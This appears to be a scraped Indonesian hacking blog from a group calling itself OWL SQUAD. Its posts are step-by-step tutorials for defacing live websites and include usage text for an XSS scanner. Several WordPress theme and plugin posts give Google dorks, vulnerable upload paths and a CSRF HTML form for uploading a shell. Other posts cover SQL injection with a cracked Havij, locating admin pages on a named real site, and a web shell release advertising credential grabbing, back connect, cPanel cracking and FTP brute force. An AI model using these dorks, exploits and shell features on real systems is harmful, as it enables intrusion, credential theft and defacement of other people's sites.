Maxteroit: Live Target

XSSSNIPER is an handy xss discovery tool with mass scanning functionalities.

Usage:
Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:
Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom


XSSSNIPER

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin


Malem mblo :p
Lama gak update yaa :3

Kali ini gw mau share Tutorial SQL Injection Using Havij. 
Simak yaa :*

Bahan :
1. Dork
Sedot
2. Havij 1.17 Full Crack
Download 

Langkah - langkah :
1. Dorking ke google.

2. Tambahin string (') di belakang url target. Kalo error berarti vuln.

3. Masukin ke Havij.

4. Klik Analyze.

5. Klik 'Get Tables'.

6. Kita cari coloumn yg isinya mungkin ada username+password atau data buat login.

7. Kalo udah cari, klik 'Get Coloumn'.

8. Nahh, abis itu kita cari data nya. Username, password, email dll.

9. Klik 'Get Data'.

Taraaa, keluar deh username + passwordnya. :)

Kalo masih belum jelas, bisa liat video dibawah ini.


Okee, sekian tutorial gw kali ini, kalo masih bingung, bisa komen di bawah ^.^
Sampe ketemu di post berikutnya :*
.
Regards,

Tutorial SQL Injection [HAVIJ]

Malem fans :p
Lama yak gaketemu :v

Kali ini gw mau share Tutorial Deface Wordpress Plugin WP-DreamWork Gallery
Lansung ajaaa

Bahan: 
1. Dork : Kembangin lagi pake otak vokepers kalian :p
inurl:/wp-content/plugins/wp-dreamworkgallery/
2. CSRF :
Klik disini

Langkah - langkah :
1. Dorking ke gugel :v

2. Pilih salah satu site.

3. Masukin target lu ke CSRF nya.

4. Buka CSRF nya.

5. Pilih file/shell yg mau lu upload.

6. Kalo sukses bakal ada nama file kalian beserta file akses nya :)

7. Tinggal buka aja deh :)

Kalo masih belum jelas, bisa liat video dibawah :)


Okee, sekian tutorial gw kali ini. Kalo masih ada yg belum ngerti, ada kolom komentar di bawah :)
.
Regards,
Berandal. [OWL SQUAD]

Deface Wordpress Plugin WP-DreamWorkGallery

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1

Tampilan Halaman Login

Haii, Kali ini gw mau share Shell buatan gw sendiri :) Shell ini gw recode dari IndoXploit Shell First Edition.
Thanks buat IndoXploit Coders Team. :)
Semua fitur dalam shell ini dibuat auto tinggal Klik-Klik sajaa.
Tampilan Shell

[RELEASE] Berandal Shell First Edition V.1

Fitur Berandal Shell:

  • K-RDP Shell
  • Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
  • Back Connect
  • CPanel/FTP Auto Deface
  • Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface.
  • Config Grabb
    • Popoji CMS
    • Voodoo CMS
    • Wordpress
    • Joomla
    • Drupal
    • Magento
    • Ellislab Devteam [CI]
    • Opencart
    • Prestashop
    • phpBB
    • Lokomedia
    • Sitelook
    • Bosweb
    • WHMCS
    • Cpanel


Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Dan fitur tambahan :

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Selamat Menikmati :)

Spesial Thanks:
.

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1



Haii fans :P
Kali ini gw mau share Tutorial Deface Wordpress Theme Theagency. :)

Bahan:
1. Dork.
inurl:/wp-content/themes/theagency
2. Exploit.
/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.
 Ambil disini.

Langkah - Langkah:

1. Dorking ke google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln = Blank.

5. Masukin site ke CSRF.

6. Pilih file/shell/ yg mau lu upload.

7. Kalo file sukses ke upload, bakal muncul angka '1'.

Akses file? 
/wp-content/themes/theagency/includes/uploadify/uploads/namafile 
contoh:
http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

Kalo masih kurang jelas, simak video tutorial gw :

 

Okee, sekian tutorial gw kali ini, semoga bermanfaat :)

Regards, 

Deface Wordpress Theme Theagency






Pagii heker :p . Sekarang gw mau sare deface Metode Themes WordPress Themes RightNow,
mumpung lagi di net :), langsung saja siapain bahan bahannya :


BAHAN:
1. Dork: 

  • inurl:/wp-content/themes/RightNow/ 
  • inurl:/wp-content/themes/RightNow/includes/
  • Index Of intext:themes/rightnow/
  • Selebihnya gunain otak Bokeper :V


2. Exploit:
/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php
contoh:
gugel.com/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php


3.  CSRF. Ambil disini.


LANGKAH - LANGKAH:

1. Dorking ke google. Klik disini.

2. Pilih salah satu site.

3. Masukkan exploit nya.

4. Kalo vuln akan blank.

5. Masukkan ke CSRF.

6. Kalo file sukses ke upload bakal ada angka '1' .

7. Akses file?
site.com/wp-content/uploads/galleryimages/


Kalo masih belum jelas, simak video gw dibawah :D




Okee, sekian tutorial gw kali ini :) See ya next time :*
Kalo pengen belajar bareng, bisa gabung grup Facebook OWL SQUAD :) Klik.
Bisa juga follow twitter gw :v Twitter.


Regards,

Deface Wordpress Themes RightNow

Subscribe Our Newsletter